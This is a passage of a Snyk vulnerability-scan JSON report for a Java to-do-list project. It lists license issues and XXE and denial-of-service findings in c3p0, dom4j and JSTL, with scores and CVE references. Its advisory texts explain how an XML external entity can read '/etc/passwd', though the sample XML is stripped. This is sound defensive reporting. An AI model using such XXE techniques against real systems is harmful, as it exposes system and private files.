"org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2" + } + ], + "ok": false, + "dependencyCount": 42, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + 
"severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "99 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": 
"2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + 
"assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + 
], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + 
"severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity 
(XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## 
Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + 